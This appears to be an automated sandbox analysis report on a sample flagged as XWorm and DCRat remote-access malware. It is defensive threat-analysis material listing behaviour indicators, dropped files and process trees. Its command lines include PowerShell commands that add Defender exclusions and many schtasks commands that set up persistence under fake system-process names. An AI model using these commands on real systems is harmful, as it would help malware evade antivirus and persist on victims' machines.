Malware Analysis Report

2024-10-10 12:54

Sample ID 240531-epvlzsee6w
Target XClient.rar
SHA256 fd3e6807f8eaed1b3ae4a229c6d17584f4985665973320342a2016b79e3ad87d
Tags
xworm dcrat execution infostealer persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fd3e6807f8eaed1b3ae4a229c6d17584f4985665973320342a2016b79e3ad87d

Threat Level: Known bad

The file XClient.rar was found to be: Known bad.

Malicious Activity Summary

xworm dcrat execution infostealer persistence rat trojan

Xworm family

Process spawned unexpected child process

Detect Xworm Payload

Xworm

DcRat

DCRat payload

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 04:07

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm family

xworm

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 04:07

Reported

2024-05-31 04:10

Platform

win11-20240508-en

Max time kernel

147s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Xworm

trojan rat xworm

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Expensive 3.1 = "C:\\Users\\Admin\\AppData\\Roaming\\Expensive 3.1.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\SysWOW64\SMI\Manifests\29c1c3cc0f7685 C:\SavesDllcommon\fontsaves.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94 C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files\Windows Media Player\Visualizations\explorer.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Program Files\Windows Media Player\Visualizations\7a0fd90576e088 C:\SavesDllcommon\fontsaves.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Migration\WTR\5940a34987c991 C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\addins\csrss.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\addins\886983d96e3d3e C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\ImmersiveControlPanel\pris\dllhost.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\ImmersiveControlPanel\pris\5940a34987c991 C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\winlogon.exe C:\SavesDllcommon\fontsaves.exe N/A
File created C:\Windows\Migration\WTR\dllhost.exe C:\SavesDllcommon\fontsaves.exe N/A
File opened for modification C:\Windows\Migration\WTR\dllhost.exe C:\SavesDllcommon\fontsaves.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\uliqxd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\SavesDllcommon\fontsaves.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\fontsaves.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\SavesDllcommon\System.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\SavesDllcommon\System.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\SavesDllcommon\fontsaves.exe N/A
Token: SeDebugPrivilege N/A C:\SavesDllcommon\System.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 568 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 568 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\uliqxd.exe
PID 568 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\uliqxd.exe
PID 568 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Users\Admin\AppData\Local\Temp\uliqxd.exe
PID 5068 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\uliqxd.exe C:\Windows\SysWOW64\WScript.exe
PID 5068 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\uliqxd.exe C:\Windows\SysWOW64\WScript.exe
PID 5068 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\uliqxd.exe C:\Windows\SysWOW64\WScript.exe
PID 5088 wrote to memory of 4360 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 5088 wrote to memory of 4360 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 5088 wrote to memory of 4360 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4360 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\SavesDllcommon\fontsaves.exe
PID 4360 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\SavesDllcommon\fontsaves.exe
PID 4000 wrote to memory of 3552 N/A C:\SavesDllcommon\fontsaves.exe C:\Windows\System32\cmd.exe
PID 4000 wrote to memory of 3552 N/A C:\SavesDllcommon\fontsaves.exe C:\Windows\System32\cmd.exe
PID 3552 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3552 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 3552 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\SavesDllcommon\System.exe
PID 3552 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\SavesDllcommon\System.exe
PID 3428 wrote to memory of 1284 N/A C:\SavesDllcommon\System.exe C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe
PID 3428 wrote to memory of 1284 N/A C:\SavesDllcommon\System.exe C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Expensive 3.1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Expensive 3.1.exe'

C:\Users\Admin\AppData\Local\Temp\uliqxd.exe

"C:\Users\Admin\AppData\Local\Temp\uliqxd.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\SavesDllcommon\gdNhr8l.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat" "

C:\SavesDllcommon\fontsaves.exe

"C:\SavesDllcommon\fontsaves.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\SavesDllcommon\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

